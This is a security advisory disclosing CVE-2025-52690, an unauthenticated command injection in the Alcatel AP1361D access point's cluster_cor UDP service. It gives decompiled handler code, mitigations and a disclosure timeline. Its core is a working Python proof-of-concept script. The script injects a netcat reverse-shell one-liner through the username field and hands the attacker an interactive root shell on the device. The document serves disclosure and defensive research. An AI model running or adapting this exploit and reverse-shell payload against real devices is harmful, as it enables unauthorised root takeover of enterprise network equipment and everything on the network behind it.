CVE-2025-52690: Alcatel AP1361D Command Injection in cluster_cor service
CVSS Score: 9.6 Critical (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Product overview
The Alcatel AP1361D is an enterprise WiFi access point.
Analysis and exploitation of this vulnerability was performed on firmware version 4.0.4, build 2046.
Vulnerability summary
The Alcatel AP1361D cluster_cor service does not sanitize the username specified by the user before using it as part of a system command.
By including special characters such as ; in the username, an unauthenticated attacker can execute arbitrary commands with root privileges on the device.
Vulnerability details
cluster_cor is a service that listens on UDP port 32769. Communication with this service is conducted over a binary protocol (based on strings in the firmware, it seems that this protocol is called hccp).
The packet format can be represented by the following struct:
struct packet __packed
{
char padding[0x3];
char type;
int16_t field_4;
uint32_t cluster_id;
char opcode;
char padding2[0x5];
char buf[0x60]
};If the packet has type 6 and opcode 7, the following handler is executed:
case 7:
{
sprintf(&cmd_buf, "uci -c /tmp set sessionId.%s.sessionId=\'%s\'",
&packet.buf, &packet.buf + 0x10);
system(&cmd_buf);
sprintf(&cmd_buf, "uci -c /tmp set sessionId.%s.sessionValidity=\'%s\'",
&packet.buf, &packet.buf + 0x50);
system(&cmd_buf);
__builtin_strcpy(&cmd_buf, "uci -c /tmp commit sessionId ");
system(&cmd_buf);
break;
}Similar to CVE-2025-52688, packet->buf, presumed to be the username, is directly interpolated into a uci command without sanitization. However, unlike CVE-2025-52688, this use of uci appears to be intended to create a session. Thus, this opcode might be for syncing user sessions between devices of the same cluster.
Whatever this opcode's purpose is, it can be accessed by unauthenticated users, thus allowing them to execute arbitrary commands as the root user.
ps: The vulnerable function is so large that IDA refused to decompile it. Luckily Binary Ninja handled it with ease.
PoC script
from pwn import *
import argparse
# Suppress all log messages except for errors
context.log_level = 'error'
# Set up argument parser
parser = argparse.ArgumentParser(description="Start a TCP listener on 0.0.0.0:lport")
parser.add_argument("--rhost", required=True, help="Remote host IP address")
parser.add_argument("--lhost", required=True, help="Local host IP address")
parser.add_argument("--lport", required=True, type=int, help="Local port to listen on")
# Parse arguments
args = parser.parse_args()
# Extract the arguments
rhost = args.rhost
lhost = args.lhost
lport = args.lport
# Start a TCP listener on 0.0.0.0:lport
listener = listen(lport)
print(f"Listening on 0.0.0.0:{lport}")
context.endian = 'big'
print(f"Running exploit against {rhost}:{0x8001}")
r = remote(rhost, 0x8001, typ='udp')
r.sendline(b"\x01"*3+b"\x06\x02\x03"+p32(100)+b"\x07"+b"c"*5+f";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f;".encode())
r.close()
conn = listener.wait_for_connection()
print(f"Connection received from {conn.rhost}")
conn.interactive()Demo video
Exploit conditions
Any unauthenticated attacker with network access to the Alcatel AP1361D device can exploit this vulnerability.
Mitigations
Alcatel recommends users of affect product to update to the latest version. If updating to the latest version is not possible, the workaround measure is to manage the affected product using Enterprise Mode with OmniVista Management platform and disable the web interface.
We are unable to assess the security of the mitigations implemented by Alcatel, as they have not granted us access to the updated firmware.
Timeline
- 2024-08-17: Report submitted to SpiritCyber IoT Hackathon triage team
- 2024-08-??: Report accepted by triage team
- ???
- 2025-04-21: CSA SingCert requests the firmware version of the affected device on behalf of Alcatel, we respond within the same day
- 2025-06-25: CSA SingCert assigns CVE-2025-52690
- 2025-07-16: Public disclosure